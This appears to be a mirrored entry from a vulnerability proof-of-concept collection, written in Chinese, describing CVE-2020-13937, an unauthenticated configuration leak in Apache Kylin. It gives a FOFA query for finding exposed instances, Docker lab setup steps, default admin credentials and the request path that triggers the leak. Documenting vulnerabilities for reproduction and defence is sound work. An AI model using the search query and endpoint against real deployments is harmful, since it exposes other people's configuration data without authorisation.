admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web服务器漏洞/Apache Kylin config 未授权配置泄露 CVE-2020-13937.md

41 lines
709 B
Markdown
Raw Normal View History

更新漏洞库:Web服务器漏洞/
2022-05-25 16:51:48 +08:00
# Apache Kylin config 未授权配置泄露 CVE-2020-13937
## 漏洞描述
Apache Kylin有一个restful api会在没有任何认证的情况下暴露配置信息
## FOFA
```
app="APACHE-kylin"
```
## 环境搭建
```
docker pull apachekylin/apache-kylin-standalone:3.0.1
docker run -d \
-m 8G \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1
```
打开后使用默认账号密码admin/KYLIN登录出现初始界面即为成功
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20220525161044773](./images/202205251610838.png)
更新漏洞库:Web服务器漏洞/
2022-05-25 16:51:48 +08:00
## 漏洞复现
漏洞验证POC
```
/kylin/api/admin/config
```
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20220525161140820](./images/202205251611885.png)
Reference in New Issue Copy Permalink